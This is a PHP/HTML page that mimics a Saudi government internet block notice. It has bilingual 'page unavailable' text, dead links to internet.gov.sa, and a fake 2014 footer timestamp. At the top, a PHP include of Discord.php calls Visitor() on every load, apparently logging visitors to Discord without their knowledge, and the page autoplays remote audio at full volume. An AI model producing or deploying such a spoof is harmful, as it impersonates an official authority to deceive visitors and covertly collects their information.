<?php
// تشغيل كود PHP قبل الصفحة
include("Discord.php");   // تأكد أن الملف في نفس المجلد
$sendembed = new Discord();
$sendembed->Visitor();
?>
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
<meta charset="UTF-8">
<title>Stop entering.</title>

<style>
    body {
        font-family: Tahoma, sans-serif;
        background: #ffffff;
        margin: 0;
        padding: 0;
    }

    .topbar {
        background: #8cc63f;
        color: #ffffff;
        padding: 8px 20px;
        font-size: 18px;
        text-align: left;
        direction: ltr;
    }

    .bottombar {
        background: #d7e8b0;
        height: 18px;
        width: 100%;
        margin-top: 40px;
    }

    .container {
        width: 100%;
        text-align: center;
        margin-top: 40px;
    }

    .arabic-text {
        font-size: 26px;
        color: #333;
        margin-bottom: 10px;
    }

    .english-text {
        font-size: 22px;
        color: #333;
        direction: ltr;
        margin-bottom: 25px;
    }

    .section {
        width: 80%;
        margin: auto;
        display: flex;
        justify-content: space-between;
        text-align: center;
        margin-top: 40px;
    }

    .right-box {
        width: 45%;
        font-size: 16px;
        line-height: 1.9;
        text-align: right;
    }

    .left-box {
        width: 45%;
        font-size: 16px;
        line-height: 1.9;
        text-align: left;
        direction: ltr;
    }

    a {
        color: #0033cc;
        text-decoration: none;
        font-weight: bold;
    }

    .footer {
        margin-top: 40px;
        font-size: 11px;
        color: #555;
        text-align: center;
        direction: LTR;
        margin-bottom: 20px;
    }
</style>

</head>

<body>

<div class="topbar">
    Dear User,
</div>

<div class="container">
    <div class="arabic-text">عفواً، الموقع المطلوب غير متاح.</div>
    <div class="english-text">Sorry, the requested page is unavailable.</div>
</div>

<div class="section">

    <div class="left-box">
        If you believe the requested page should not be blocked please  
        <a href="#">click here</a>.<br><br>

        For more information about Internet service in Saudi Arabia,<br>
        please click here:  
        <a href="#">www.internet.gov.sa</a>
    </div>

    <div class="right-box">
        إن كنت ترى أن هذه الصفحة تظهر لك بالخطأ وتبين لك أن لا تُحجب تفضل  
        <a href="#">بالضغط هنا</a>.<br><br>

        لمزيد من المعلومات عن خدمة الإنترنت في المملكة العربية السعودية،
        تفضل بزيارة الموقع:  
        <a href="#">www.internet.gov.sa</a>
    </div>

</div>

<div class="bottombar"></div>

<div class="footer">
    This page was generated by secluded [04/Jan/2014:12:55:02 +0300]
</div>

<!-- يشغل الصوت تلقائياً -->
<audio id="background-audio" autoplay>
    <source src="https://files.catbox.moe/7icemy.mp3" type="audio/mpeg">
</audio>

<script>
    // محاولة التشغيل التلقائي – لو المتصفح منع الصوت، تظهر رسالة بالكونسول فقط
    document.addEventListener('DOMContentLoaded', () => {
        const audio = document.getElementById('background-audio');
        audio.volume = 1.0;
        audio.play().catch(() => {
            console.log("المتصفح منع التشغيل التلقائي — يحتاج كلك من المستخدم.");
        });
    });
</script>

</body>
</html>
